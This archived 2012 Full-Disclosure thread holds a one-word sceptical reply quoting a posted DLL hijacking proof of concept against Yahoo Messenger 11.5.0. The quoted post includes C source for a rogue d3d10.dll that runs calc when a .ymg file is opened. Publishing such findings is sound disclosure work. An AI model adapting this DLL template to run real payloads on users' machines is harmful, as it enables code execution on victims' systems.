lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sat, 25 Aug 2012 16:45:52 +0300
From: Julius Kivimäki <julius.kivimaki@...il.com>
To: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: yahoo messenger 11.5.0 (d3d10.dll) DLL
 Hijacking Exploit

Seriously?

2012/8/25 kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>

> Exploit Title: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit
> Date: 2012-08-23
> Author: coolkaveh
> coolkaveh@...ketmail.com
> Https://twitter.com/coolkaveh
> Vendor Homepage: http://www.yahoo.com/
> Version: 11.5.0228-us
> Tested on: windows XP Sp3 ENG
> Greets To Mohammad Morteza Sanaie
> sanaie.morteza@...il.com
> ---------------------------------------------------------
> # Vulnerable: yahoomessenger.exe
> ---------------------------------------------------------
> # Vulnerable extensions: .ymg
> ---------------------------------------------------------
> # Vulnerable Dll: d3d10.dll
> ---------------------------------------------------------
> #include <windows.h>
> #define DllExport __declspec (dllexport)
>
> DllExport void hook_startup() { exp(); }
>
> int exp()
> {
>   WinExec("calc", 0);
>   exit(0);
>   return 0;
> }
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ